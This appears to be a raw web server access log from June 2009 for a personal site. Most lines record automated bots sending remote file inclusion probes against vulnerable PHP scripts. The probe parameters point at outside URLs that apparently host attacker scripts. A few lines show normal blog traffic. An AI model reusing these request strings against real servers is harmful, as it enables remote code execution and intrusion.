121.15.254.22 - - [21/Jun/2009:09:15:07 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 105058 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:15:08 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:15:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:15:10 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:15:11 -0700] "GET /logs/access_081028.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:15:13 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:09:15:23 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 21020 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:09:15:28 -0700] "GET /logs/access_081021.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:15:37 -0700] "GET /logs/access_071231.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [21/Jun/2009:09:15:38 -0700] "GET /logs/access_071216.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:15:50 -0700] "GET /logs/access_080929.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:15:50 -0700] "GET /logs/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:15:50 -0700] "GET /errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:15:59 -0700] "GET /logs/access_081028.log/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:16:30 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:16:30 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:16:34 -0700] "GET /logs/access_080616.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:09:16:37 -0700] "GET /logs/access_081117.log/?error=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:09:16:37 -0700] "GET /logs/?error=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 105050 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:16:38 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:16:38 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:09:16:53 -0700] "GET /?error=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 20990 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.30.80 - - [21/Jun/2009:09:17:09 -0700] "GET /logs/access_081118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.30.80 - - [21/Jun/2009:09:17:12 -0700] "GET /logs/access_081118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:17:16 -0700] "GET /logs/access_080121.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:17:32 -0700] "GET /logs/access_081223.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:17:32 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:17:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:17:32 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.30.80 - - [21/Jun/2009:09:17:35 -0700] "GET /logs/access_081118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.30.80 - - [21/Jun/2009:09:17:55 -0700] "GET /logs/access_090228.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:06 -0700] "GET /logs/access_080401.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:06 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:06 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:07 -0700] "GET /logs/access_080401.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:08 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:08 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:08 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:08 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:08 -0700] "GET /logs/access_080401.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:18 -0700] "GET /logs/access_080425.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:19 -0700] "GET /logs/access_080425.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:18:21 -0700] "GET /logs/access_080425.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:18:23 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:18:23 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:18:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:18:24 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:18:24 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:18:24 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:18:39 -0700] "GET /index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20890 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:18:55 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:09:18:56 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:09:18:56 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:09:18:56 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:09:18:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:19:00 -0700] "GET /logs/access_080520.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:19:00 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:19:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
88.84.128.40 - - [21/Jun/2009:09:19:12 -0700] "GET /index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20885 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:09:19:15 -0700] "GET /index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20890 "-" "Mozilla/5.0" "dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:32 -0700] "GET /nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:32 -0700] "GET /logs/access_081128.log%20%20/nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:32 -0700] "GET /logs/nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:35 -0700] "GET /logs/nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:35 -0700] "GET /logs/access_081128.log%20%20/nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.171.4 - - [21/Jun/2009:09:19:35 -0700] "GET /nav.php?loc=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:38 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:38 -0700] "GET /logs/access_081029.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:38 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:41 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:41 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:42 -0700] "GET /logs/access_081029.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:42 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:42 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:19:42 -0700] "GET /logs/access_081029.log//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:47 -0700] "GET /logs/access_080523.log%20%20//index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:47 -0700] "GET /logs//index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:47 -0700] "GET /index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:48 -0700] "GET /logs/access_080523.log%20%20//index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:48 -0700] "GET /logs//index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:48 -0700] "GET /index.php?option=com_content&task=categ…//mainbody.php?_VALID_MOS=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:19:51 -0700] "GET /logs/access_080121.log%20%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:54 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:54 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:54 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:19:54 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:09:19:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:20:02 -0700] "GET /logs/access_080929.log%20%20/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:09:20:02 -0700] "GET /logs/access_081028.log%20%20/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:09 -0700] "GET /index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20890 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:13 -0700] "GET /logs/access_090521.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:13 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:13 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:13 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:09:20:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:20:24 -0700] "GET /logs/access_080929.log%20%20/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:09:20:25 -0700] "GET /logs/access_081028.log%20%20/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:09:20:28 -0700] "GET /index.php?option=com_custompages&cpage=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20890 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:09:20:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:09:20:54 -0700] "GET /logs/access_081117.log%20%20/?error=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.122 - - [21/Jun/2009:09:20:57 -0700] "GET /blog/index.php/2009/04/19/klr-04182009/ HTTP/1.0" 200 22804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:21:09 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:17 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs/access_080425.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs/access_080401.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs/access_080425.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:18 -0700] "GET /logs/access_080401.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:21 -0700] "GET /include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:21 -0700] "GET /logs//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:21 -0700] "GET /logs/access_080425.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [21/Jun/2009:09:21:21 -0700] "GET /logs/access_080401.log%20%20//include/write.php?dir=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:22:22 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:22:22 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.140.142.39 - - [21/Jun/2009:09:22:23 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:23:11 -0700] "GET /logs/access_080825.log/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:23:12 -0700] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [21/Jun/2009:09:23:16 -0700] "GET /logs/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
